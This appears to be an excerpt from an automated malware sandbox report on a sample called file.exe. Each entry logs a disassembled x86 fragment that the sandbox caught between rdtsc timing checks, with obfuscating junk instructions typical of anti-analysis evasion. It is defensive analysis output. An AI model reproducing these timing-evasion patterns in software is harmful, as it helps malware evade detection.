                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10154 second address: A1015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1015F second address: A10163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEEA second address: A0DF09 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E92Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F242906E92Ch 0x00000013 jl 00007F242906E926h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DF09 second address: A0DF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10163 second address: A101DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F242906E926h 0x0000000d jmp 00007F242906E92Ch 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push ecx 0x00000016 mov ebx, dword ptr [ebp+122D2CB6h] 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F242906E928h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D3448h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 call 00007F242906E928h 0x00000049 pop ebx 0x0000004a mov dword ptr [esp+04h], ebx 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ebx 0x00000057 push ebx 0x00000058 ret 0x00000059 pop ebx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D2692h] 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 pushad 0x00000066 popad 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A103AF second address: A103B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11345 second address: A11349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11349 second address: A11353 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11353 second address: A11412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ebx, 4B686E9Fh 0x0000000c sbb bx, EF1Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F242906E928h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jnl 00007F242906E931h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007F242906E92Bh 0x00000044 mov eax, dword ptr [ebp+122D0CF9h] 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007F242906E928h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 xor dword ptr [ebp+122D344Dh], ebx 0x0000006a mov bl, C7h 0x0000006c push FFFFFFFFh 0x0000006e or ebx, 26558347h 0x00000074 nop 0x00000075 jmp 00007F242906E931h 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push edx 0x0000007e jmp 00007F242906E932h 0x00000083 pop edx 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A141FA second address: A14226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F2429065B58h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15157 second address: A1515D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1515D second address: A15161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160CD second address: A160D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160D6 second address: A160DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160DA second address: A160DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160DE second address: A16102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2429065B4Bh 0x0000000f jo 00007F2429065B46h 0x00000015 popad 0x00000016 jng 00007F2429065B4Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19E88 second address: A19EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jns 00007F242906E93Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EAD second address: A19EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EB5 second address: A19EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19EB9 second address: A19EC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F2429065B4Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDD14 second address: 9CDD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C6BD second address: A1C73D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov eax, dword ptr [ebp+1245D004h] 0x00000013 mov dword ptr [ebp+122D28D3h], ebx 0x00000019 popad 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov ebx, dword ptr [ebp+1247E3D7h] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2429065B48h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 push ecx 0x00000049 mov edi, dword ptr [ebp+122D36E5h] 0x0000004f pop edi 0x00000050 mov eax, dword ptr [ebp+122D0CF1h] 0x00000056 or dword ptr [ebp+122D2B6Eh], ebx 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, dword ptr [ebp+122D33F7h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 pushad 0x00000069 popad 0x0000006a pop ecx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C73D second address: A1C743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EE8B second address: A1EE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EE8F second address: A1EE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20D20 second address: A20D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20D24 second address: A20D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A054 second address: A2A058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A058 second address: A2A068 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F242906E926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A37D second address: A2A381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA17 second address: A2DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA1B second address: A2DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DA1F second address: A2DA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB3DB second address: 9BB3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2429065B46h 0x0000000a popad 0x0000000b js 00007F2429065B52h 0x00000011 jo 00007F2429065B46h 0x00000017 jbe 00007F2429065B46h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB3F8 second address: 9BB429 instructions: 0x00000000 rdtsc 0x00000002 je 00007F242906E93Eh 0x00000008 jmp 00007F242906E936h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F242906E92Dh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB429 second address: 9BB449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2429065B4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F2429065B46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F1FB second address: A2F208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F2BE second address: A2F2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F2C2 second address: A2F2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A363E9 second address: A36409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2429065B58h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35082 second address: A35088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A358EB second address: A35937 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2429065B5Ah 0x0000000c jmp 00007F2429065B59h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2429065B51h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D48 second address: A35D79 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F242906E935h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F242906E92Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D79 second address: A35D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Eh 0x00000009 jbe 00007F2429065B46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D91 second address: A35D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D95 second address: A35D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35F4A second address: A35F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35F4E second address: A35F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2429065B57h 0x0000000c jmp 00007F2429065B4Bh 0x00000011 pop eax 0x00000012 jnp 00007F2429065B5Ch 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007F2429065B54h 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD6A second address: A3BD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jno 00007F242906E926h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD7F second address: A3BD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD83 second address: A3BDA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E932h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDA1 second address: A3BDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7AE second address: A3A7E6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F242906E926h 0x00000008 jmp 00007F242906E936h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F242906E934h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A7E6 second address: A3A804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2429065B59h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAA0 second address: A3AAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAA4 second address: A3AAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAAE second address: A3AAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAB8 second address: A3AABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ADCC second address: A3ADD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ADD0 second address: A3ADE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F2429065B4Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE18B second address: 9EE190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A496 second address: A3A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B4Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A4A9 second address: A3A4B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A407FE second address: A40814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F2429065B46h 0x0000000d popad 0x0000000e jng 00007F2429065B4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5B3 second address: A3F5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5B7 second address: A3F5D8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2429065B46h 0x00000008 jnl 00007F2429065B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F2429065B4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03E57 second address: A03E5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0476C second address: A04776 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04776 second address: A0477A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A048D0 second address: A048D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04BCD second address: A04C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E92Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov cl, 88h 0x00000010 lea eax, dword ptr [ebp+12485629h] 0x00000016 mov edi, eax 0x00000018 call 00007F242906E935h 0x0000001d mov edx, 564420AEh 0x00000022 pop ecx 0x00000023 nop 0x00000024 pushad 0x00000025 pushad 0x00000026 jbe 00007F242906E926h 0x0000002c jng 00007F242906E926h 0x00000032 popad 0x00000033 jg 00007F242906E935h 0x00000039 popad 0x0000003a push eax 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C36 second address: A04C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C3A second address: A04C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04C3E second address: 9EE18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 je 00007F2429065B46h 0x0000000e call dword ptr [ebp+122D22FAh] 0x00000014 jns 00007F2429065B73h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d jmp 00007F2429065B4Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8F0 second address: A3F8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8F4 second address: A3F8FE instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F8FE second address: A3F905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F905 second address: A3F90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FACB second address: A3FAD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E92Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC17 second address: A3FC3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2429065B56h 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC3A second address: A3FC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F242906E932h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F242906E92Dh 0x00000012 jnc 00007F242906E926h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC69 second address: A3FC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F2429065B46h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E48 second address: A44E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E4D second address: A44E52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E52 second address: A44E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F242906E92Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F242906E932h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E77 second address: A44E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Dh 0x00000009 jmp 00007F2429065B4Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44FC5 second address: A44FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F242906E926h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44FD5 second address: A44FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B4Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4544F second address: A4545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F242906E92Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44A0D second address: A44A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
